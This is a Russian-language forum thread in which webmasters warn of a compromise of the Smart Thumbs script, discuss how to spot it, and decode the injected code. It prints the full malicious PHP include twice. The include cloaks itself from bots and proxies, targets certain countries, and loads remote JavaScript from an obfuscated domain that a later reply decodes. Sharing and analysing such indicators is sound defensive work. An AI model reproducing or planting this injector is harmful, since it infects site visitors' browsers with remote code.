Smart Thumbs - снова старая песня. Проверяем.

Для мамонтов вроде меня, кто ещё юзает Smart Thumbs, советую проверить /st/admin/variables.php на предмет разного рода несанкционированых инклудов. У меня стояли последние версии: 5.83.
Первый клик по тумбе на сайте вставляет вредоносный код. Отлавливается KIS-ом или можно увидеть в хедерах при первом клике по тумбе (смотрите вторую строку в хедерах). Все последующие клики, заходы на сайт уже ничего оне показывают, ловить надо на свежую.

Было бы неплохо засветить код что был в variables.php
что бы знать хоть примерно что искать

Код может отличаться. Тут могу быть разные имена файлов инклуда:
$bookmark_enabled=0;@include_once('/tmp/qcq');

В qcq такое содержание (cразу подготовленное для DTR и SCJ помимо ST):

Код: [развернуть]

$qout=($qout)?$qout:'(/out.php|/st/st.php|/scj/cgi/out.php|/dtr/link.php)'; if(!$_COOKIE['qc'] && ((!$_SERVER['HTTP_X_REAL_IP'] && preg_match("%keep-alive%i", $_SERVER['HTTP_CONNECTION'])) || $_SERVER['HTTP_X_REAL_IP']) && $_SERVER['HTTP_USER_AGENT'] && !preg_match("%bot%i",$_SERVER['HTTP_USER_AGENT']) && preg_match("%(msie|chrome|firefox)%i",$_SERVER['HTTP_USER_AGENT']) && $_SERVER['HTTP_ACCEPT_LANGUAGE'] && !$_SERVER['HTTP_X_FORWARDED_FOR'] && !$_SERVER['HTTP_X_FORWARDED'] && !$_SERVER['HTTP_FORWARDED_FOR'] && !$_SERVER['HTTP_FORWARDED'] && !$_SERVER['HTTP_VIA'] && !$_SERVER['HTTP_X_COMING_FROM'] && !$_SERVER['HTTP_COMING_FROM'] && !$_SERVER['HTTP_CLIENT_IP'] && !$_SERVER['HTTP_PROXY_USER'] && !$_SERVER['HTTP_PROXY_CONNECTION'] && (($_SERVER['GEOIP_COUNTRY_CODE'] && preg_match("%(US|CA|AU|GB|DE|DK|FR|SE|CH|NL|IT|BE|AT|ES|NO|IE|FI|NZ)%", $_SERVER['GEOIP_COUNTRY_CODE'])) || ($_SERVER['HTTP_ACCEPT_LANGUAGE'] && preg_match("%(en|de|da|fr|sv|it|es|nl|no|fi)%i", $_SERVER['HTTP_ACCEPT_LANGUAGE'])))){ error_reporting(0);$qd=chr(105).chr(119).chr(110).chr(101).chr(99).chr(46).chr(99).chr(111).chr(109); if($qi && $_SERVER['HTTP_REFERER'] && !preg_match("%{$_SERVER['HTTP_HOST']}%i", $_SERVER['HTTP_REFERER'])){echo "<script src='http://{$qd}/'></script>";} elseif (is_array($_COOKIE) && $_SERVER['HTTP_REFERER'] && preg_match("%{$_SERVER['HTTP_HOST']}%i", $_SERVER['HTTP_REFERER']) && preg_match("%$qout%i", $_SERVER['SCRIPT_NAME'])){header("Set-Cookie: qc=1; path=/; expires=". gmdate('D, d-M-Y H:i:s', time()+604800) ." GMT;");echo "<html><body><script>var wo=window.opener.document.createElement('script');wo.src='http://{$qd}/?1';window.opener.document.body.appendChild(wo);window.name='_blanq';window.location.reload();</script><body></html>";exit();} } ?>

S_Flash писал:

Код может отличаться. Тут могу быть разные имена файлов инклуда: $bookmark_enabled=0;@include_once('/tmp/qcq'); В qcq такое содержание (cразу подготовленное для DTR и SCJ помимо ST): Код: [развернуть] $qout=($qout)?$qout:'(/out.php|/st/st.php|/scj/cgi/out.php|/dtr/link.php)'; if(!$_COOKIE['qc'] && ((!$_SERVER['HTTP_X_REAL_IP'] && preg_match("%keep-alive%i", $_SERVER['HTTP_CONNECTION'])) || $_SERVER['HTTP_X_REAL_IP']) && $_SERVER['HTTP_USER_AGENT'] && !preg_match("%bot%i",$_SERVER['HTTP_USER_AGENT']) && preg_match("%(msie|chrome|firefox)%i",$_SERVER['HTTP_USER_AGENT']) && $_SERVER['HTTP_ACCEPT_LANGUAGE'] && !$_SERVER['HTTP_X_FORWARDED_FOR'] && !$_SERVER['HTTP_X_FORWARDED'] && !$_SERVER['HTTP_FORWARDED_FOR'] && !$_SERVER['HTTP_FORWARDED'] && !$_SERVER['HTTP_VIA'] && !$_SERVER['HTTP_X_COMING_FROM'] && !$_SERVER['HTTP_COMING_FROM'] && !$_SERVER['HTTP_CLIENT_IP'] && !$_SERVER['HTTP_PROXY_USER'] && !$_SERVER['HTTP_PROXY_CONNECTION'] && (($_SERVER['GEOIP_COUNTRY_CODE'] && preg_match("%(US|CA|AU|GB|DE|DK|FR|SE|CH|NL|IT|BE|AT|ES|NO|IE|FI|NZ)%", $_SERVER['GEOIP_COUNTRY_CODE'])) || ($_SERVER['HTTP_ACCEPT_LANGUAGE'] && preg_match("%(en|de|da|fr|sv|it|es|nl|no|fi)%i", $_SERVER['HTTP_ACCEPT_LANGUAGE'])))){ error_reporting(0);$qd=chr(105).chr(119).chr(110).chr(101).chr(99).chr(46).chr(99).chr(111).chr(109); if($qi && $_SERVER['HTTP_REFERER'] && !preg_match("%{$_SERVER['HTTP_HOST']}%i", $_SERVER['HTTP_REFERER'])){echo "<script src='http://{$qd}/'></script>";} elseif (is_array($_COOKIE) && $_SERVER['HTTP_REFERER'] && preg_match("%{$_SERVER['HTTP_HOST']}%i", $_SERVER['HTTP_REFERER']) && preg_match("%$qout%i", $_SERVER['SCRIPT_NAME'])){header("Set-Cookie: qc=1; path=/; expires=". gmdate('D, d-M-Y H:i:s', time()+604800) ." GMT;");echo "<html><body><script>var wo=window.opener.document.createElement('script');wo.src='http://{$qd}/?1';window.opener.document.body.appendChild(wo);window.name='_blanq';window.location.reload();</script><body></html>";exit();} } ?>

и смартсж поломали?

Каково действие кода? Редиректит куда траф или что-то еще?

Скорее загружает что-то. Есть разница?
Вот урл, смотри, что он делает
$qd=chr(105).chr(119).chr(110).chr(101).chr(99).chr(46).chr(99).chr(111).chr(109);

Както Смарт Тумбс вяло следит и реагирует за своими уязвимостями.

Както Смарт Тумбс вяло следит и реагирует за своими уязвимостями.

S_Flash писал:

Скорее загружает что-то. Есть разница? Вот урл, смотри, что он делает $qd=chr(105).chr(119).chr(110).chr(101).chr(99).chr(46).chr(99).chr(111).chr(109);

кто-нибудь изучал вопрос детальнее?

откуда ноги растут у этой дряни? уже который год.

S_Flash писал:

Скорее загружает что-то. Есть разница? Вот урл, смотри, что он делает $qd=chr(105).chr(119).chr(110).chr(101).chr(99).chr(46).chr(99).chr(111).chr(109);

Код: [развернуть]

$qd=chr(105).chr(119).chr(110).chr(101).chr(99).chr(46).chr(99).chr(111).chr(109); Равно $qd=iwnec.com;